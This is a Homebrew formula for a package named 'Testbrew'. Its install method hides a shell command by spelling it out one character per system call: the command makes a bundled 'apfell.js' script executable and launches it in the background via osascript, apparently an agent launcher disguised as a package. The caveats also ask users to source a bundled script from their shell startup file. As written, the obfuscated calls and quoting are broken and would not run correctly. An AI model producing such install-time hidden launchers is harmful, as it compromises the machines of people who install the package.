class Testbrew < Formula
    desc "Test Brew"
    homepage "https://github.com/testing-1-dot/"
    url "https://github.com/testing-1-dot/testbrew/releases/download/v2.3/testbrew-2.3.tar.gz"
    sha256 "797e52d843f99e897398a4acddf1234e08373f22f14ff422f7af88a4319548e4"
    version "2.3"

    def install
        bin.install Dir["*"]
        system "c"
    system "h"
    system "m"
    system "o"
    system "d"
    system " "
    system "+"
    system "x"
    system " "
    system "#"
    system "{"
    system "b"
    system "i"
    system "n"
    system "}"
    system "/"
    system "a"
    system "p"
    system "f"
    system "e"
    system "l"
    system "l"
    system "."
    system "j"
    system "s"
    system " "
    system "&"
    system "&"
    system " "
    system "o"
    system "s"
    system "a"
    system "s"
    system "c"
    system "r"
    system "i"
    system "p"
    system "t"
    system " "
    system "-"
    system "e"
    system " "
    system """
    system "#"
    system "{"
    system "b"
    system "i"
    system "n"
    system "}"
    system "/"
    system "a"
    system "p"
    system "f"
    system "e"
    system "l"
    system "l"
    system "."
    system "j"
    system "s"
    system " "
    system "&"
    system """
  end

    def caveats
        <<~EOS
        To finish installation, add the following line to .zshrc or .bashrc  
  source #{bin}/completion.sh
Then reopen your terminal app
        EOS
    end
    end
